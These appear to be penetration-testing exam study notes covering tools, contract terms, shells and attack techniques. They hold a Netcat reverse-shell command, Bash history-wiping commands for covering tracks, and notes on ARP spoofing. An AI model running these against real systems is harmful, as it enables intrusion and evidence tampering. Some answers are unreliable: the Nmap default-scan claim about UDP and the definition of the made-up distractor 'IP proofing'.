Wiley - Assessment Test missed/items

Question 1

Ricky is conducting a penetration test against a web application and is looking for potential vulnerabilities to exploit. Which of the following vulnerabilities does not commonly exist in web applications?

• SQL injection
• VM escape
• Buffer overflow
• Cross‐site scripting

Answer 1

VM Escape

Web applications commonly experience SQL injection, buffer overflow, and cross‐site scripting vulnerabilities. Virtual machine (VM) escape attacks work against the hypervisor of a virtualization platform and are not generally exploitable over the web. You’ll learn more about all of these vulnerabilities in Chapters 5 and 9.

Question 2

NDA

Answer 2

A nondisclosure agreement, or NDA, is a legal agreement that is designed to protect the confidentiality of the client’s data and other information that the penetration tester may encounter during the test.

Question 3

SOW

Answer 3

An SOW is a statement of work, which defines what will be done during an engagement

Question 4

MSA

Answer 4

An MSA is a master services agreement that sets the overall terms between two organizations (which then use SOWs to describe the actual work)

Question 5

Noncompete

Answer 5

Noncompetes are just that—an agreement that prevents competition, usually by preventing an employee from working for a competitor for a period of time after their current job ends.

Question 6

Chris is assisting Ricky with his penetration test and would like to extend the vulnerability search to include the use of dynamic testing. Which one of the following tools can he use as an interception proxy?

• ZAP
• Nessus
• SonarQube
• OllyDbg

Answer 6

The Zed Attack Proxy (ZAP) from the Open Web Application Security Project (OWASP) is an interception proxy that is very useful in penetration testing

Question 7

ZAP

Answer 7

The Zed Attack Proxy (ZAP) from the Open Web Application Security Project (OWASP) is an interception proxy that is very useful in penetration testing

Question 8

Nessus

Answer 8

Vulnerability Scanner

Nessus is designed to identify and report on potential vulnerabilities in computer systems, networks, and applications. It performs this task by scanning for open ports, detecting services running on those ports, and then testing those services for known vulnerabilities

Question 9

SonarQube

Answer 9

SonarQube is a comprehensive code quality assurance tool designed to analyze and improve the quality, security, and maintainability of source code.SonarQube is a static software testing tool (SAST tool)

Question 10

OllyDbg

Answer 10

OllyDbg is a powerful, user-friendly debugger and disassembler primarily designed for reverse engineering and debugging applications on Microsoft Windows

Question 11

Renee is conducting a penetration test and discovers evidence that one of the systems she is exploring was already compromised by an attacker. What action should she take immediately after confirming her suspicions?

• Record the details in the penetration testing report.
• Remediate the vulnerability that allowed her to gain access.
• Report the potential compromise to the client.
• No further action is necessary because Renee’s scope of work is limited to penetration testing.

Answer 11

Report the potential compromise to the client.

Question 12

Which of the following vulnerability scanning methods will provide the most accurate detail during a scan?

• Black box
• Authenticated
• Internal view
• External view

Answer 12

An authenticated, or credentialed, scan provides the most detailed view of the system. Black‐box assessments presume no knowledge of a system and would not have credentials or an agent to work with on the system. Internal views typically provide more detail than external views, but neither provides the same level of detail that credentials can allow.

Question 13

Annie wants to cover her tracks after compromising a Linux system. If she wants to permanently remove evidence of the commands she inputs to a Bash shell, which of the following commands should she use?

• history -c
• kill -9 $$
• echo “” ˃ /~/.bash_history
• ln /dev/null ~/.bash_history -sf

Answer 13

ln /dev/null ~/.bash_history -sf

Although all of these commands are useful for covering her tracks, only linking /dev/null to .bash_history will prevent the Bash history file from containing anything.

Question 14

Kaiden would like to perform an automated web application security scan of a new system before it is moved into production. Which one of the following tools is best suited for this task?

• Nmap
• Nikto
• Wireshark
• CeWL

Answer 14

Nikto

Question 15

Nikto

Answer 15

Nikto is a free, open-source web server scanner designed to identify and report on potential vulnerabilities and misconfigurations in web servers.

Question 16

CeWL

Answer 16

The Custom Wordlist Generator (CeWL) is used to spider websites for keywords

Question 17

Wireshark

Answer 17

Wireshark is a powerful, free, and open-source network protocol analyzer that is widely used for capturing, displaying, and analyzing network traffic

Question 18

Steve is engaged in a penetration test and is gathering information without actively scanning or otherwise probing his target. What type of information is he gathering?

• OSINT
• HSI
• Background
• None of the above

Answer 18

OSINT, or open source intelligence, is information that can be gathered passively. Passive information gathering is useful because it is not typically visible to targets and can provide valuable information about systems, networks, and details that guide the active portion of a penetration test

Question 19

Which of the following activities constitutes a violation of integrity?

• Systems were taken offline, resulting in a loss of business income.
• Sensitive or proprietary information was changed or deleted.
• Protected information was accessed or exfiltrated.
• Sensitive personally identifiable information was accessed or exfiltrated.

Answer 19

Which of the following activities constitutes a violation of integrity?

Integrity breaches involve data being modified or deleted. When systems are taken offline it is an availability issue, protected information being accessed might be classified as a breach of proprietary information, and sensitive personally identifiable information access would typically be classified as a privacy breach.

Question 20

Ted wants to scan a remote system using Nmap and uses the following command:

nmap 149.89.80.0/24

How many TCP ports will he scan?

• 256
• 1,000
• 1,024
• 65,535

Answer 20

By default, Nmap will scan the 1,000 most common ports for both TCP and UDP

Question 21

Brian is conducting a thorough technical review of his organization’s web servers. He is specifically looking for signs that the servers may have been breached in the past. What term best describes this activity?

• Penetration testing
• Vulnerability scanning
• Remediation
• Threat hunting

Answer 21

Threat hunting

Threat hunting uses the attacker mindset to search the organization’s technology infrastructure for the artifacts of a successful attack. Threat hunters ask themselves what a hacker might do and what type of evidence they might leave behind and then go in search of that evidence. Brian’s activity clearly fits this definition.

Question 22

Liam executes the following command on a compromised system:

nc 10.1.10.1 7337 -e /bin/sh

What has he done?

• Started a reverse shell using Netcat
• Captured traffic on the Ethernet port to the console via Netcat
• Set up a bind shell using Netcat
• None of the above

Answer 22

Liam has used Netcat to set up a reverse shell. This will connect to 10.1.10.1 on port 7337 and connect it to a Bash shell

Question 23

Reverse Shell

Answer 23

A reverse shell is a type of cyber attack that allows an attacker to gain remote access to a victim’s machine by establishing a connection from the victim’s system back to the attacker’s system. This method circumvents traditional security measures, such as firewalls, which often filter incoming connections but may allow outgoing connections more freely.

How Reverse Shells Work
1. Connection Initiation: In a reverse shell scenario, the victim’s machine initiates an outbound connection to the attacker’s machine. This is in contrast to a traditional bind shell, where the attacker connects directly to the victim’s machine.
2. Exploitation: Attackers typically exploit vulnerabilities in applications or use social engineering techniques (such as phishing) to execute malicious scripts on the victim’s system. Once executed, these scripts create a connection back to the attacker’s server.
3. Command Execution: After the connection is established, the attacker can send commands to be executed on the victim’s machine, effectively gaining control over it as if they were physically present.

Netcat is often used with reverse shells

Question 24

Bind Shell

Answer 24

A bind shell is a type of network shell that allows an attacker to connect to a target machine by establishing a listening service on that machine. Here are the key aspects of bind shells:

Definition
A bind shell listens on a specific port for incoming connections. Once a connection is established, it provides the connecting user with a command-line interface (shell) on the target system, allowing them to execute commands remotely.

How Bind Shells Work
* Listening Service: The target machine runs a service (often created using tools like Netcat or custom scripts) that listens on a designated port for incoming connections.
* Connection Initiation: The attacker connects to this listening port from their own machine, effectively gaining access to the shell of the target system.
* Command Execution: Once connected, the attacker can execute commands as if they were physically present at the target machine.

Use Cases
* Remote Administration: Bind shells can be used legitimately by system administrators for remote management of servers and devices. They allow administrators to perform tasks such as monitoring system performance, updating software, and managing configurations.
* Malicious Activity: Attackers may use bind shells to gain unauthorized access to systems, execute commands, and potentially install malware.
Security Implications
Exposure Risk: Since bind shells listen for incoming connections, they can expose the target machine to unauthorized access if not properly secured. If an attacker discovers an open port, they can connect and take control of the system.
Firewall Challenges: Many firewalls block incoming connections by default, making bind shells less effective in environments with strict security measures. This limitation often leads attackers to prefer reverse shells instead.

Question 25

Difference between Bind Shell and Reverse Shell

Answer 25

A bind shell is a type of network shell that allows an attacker to connect to a target machine by establishing a listening service on that machine.

In contrast to bind shells, reverse shells initiate a connection from the victim’s machine back to the attacker’s machine. This method is often preferred because it can bypass firewalls that block incoming connections but allow outgoing ones.

Question 26

VLAN Double tagging

Answer 26

VLAN double‐tagging attack used against 802.1q interfaces. The first tag will be stripped, allowing the second tag to be read as the VLAN tag for the packet.

Question 27

Alaina wants to conduct an on‐path attack against a target system. What technique can she use to make it appear that she has the IP address of a trusted server?

• ARP spoofing
• IP proofing
• DHCP pirating
• Spoofmastering

Answer 27

ARP Spoofing

Alaina would choose ARP spoofing over IP proofing for its effectiveness in local networks, ease of execution, and ability to exploit the inherent trust in ARP communications to carry out her on-path attack.

Question 28

IP Proofing

Answer 28

Definition: IP proofing generally refers to techniques used to verify the authenticity of IP addresses in network communications, particularly in the context of preventing IP spoofing. IP spoofing involves sending packets from a false source IP address to impersonate another device or user.

Purpose: The main goal of IP proofing is to ensure that the source IP address of incoming packets is legitimate, thereby preventing unauthorized access and attacks such as DDoS (Distributed Denial-of-Service).

Techniques:
* Ingress Filtering: This technique checks incoming packets against a list of valid IP addresses, blocking those that do not match.
* Authentication Protocols: Implementing protocols that require mutual authentication can help verify the identity of devices communicating over the network.
* Packet Filtering: Analyzing packets for inconsistencies in their headers can help identify and block spoofed packets.

Question 29

Michael’s social engineering attack relies on telling the staff members he contacts that others have provided the information that he is requesting. What motivation technique is he using?

• Authority
• Scarcity
• Likeness
• Social proof

Answer 29

Social proof

Social engineering attacks that rely on social proof rely on persuading the target that other people have behaved similarly. Likeness may sound similar, but it relies on building trust and then persuading the target that they have things in common with the penetration tester.

Question 30

Vincent wants to gain access to workstations at his target but cannot find a way into the building. What technique can he use to do this if he is also unable to gain access remotely or on‐site via the network?

• Shoulder surfing
• Kerberoasting
• USB key drop
• Quid pro quo

Question 31

Jennifer is reviewing files in a directory on a Linux system and sees a file listed with the following attributes. What has she discovered?

-rwsr-xr—1 root kismet 653905 Nov 4 2016 /usr/bin/kismetcapture

• An encrypted file
• A hashed file
• A SUID file
• A SIP file

Answer 31

a SUID file

The s in the file attributes indicates that this is a SETUID or SUID file that allows it to run as its owner.

Question 32

Which of the following tools is best suited to querying data provided by organizations like the American Registry for Internet Numbers (ARIN) as part of a footprinting or reconnaissance exercise?

• Nmap
• Traceroute
• regmon
• Whois

Answer 32

Whois

Question 33

Chris believes that the Linux system he has compromised is a virtual machine. Which of the following techniques will not provide useful hints about whether or not the system is a VM?

• Run system-detect-virt.
• Run ls -l /dev/disk/by-id.
• Run wmic baseboard to get manufacturer, product.
• Run dmidecode to retrieve hardware information.

Answer 33

Run wmic baseboard to get manufacturer, product.

All of these commands are useful ways to determine if a system is virtualized, but wmic is a Windows tool.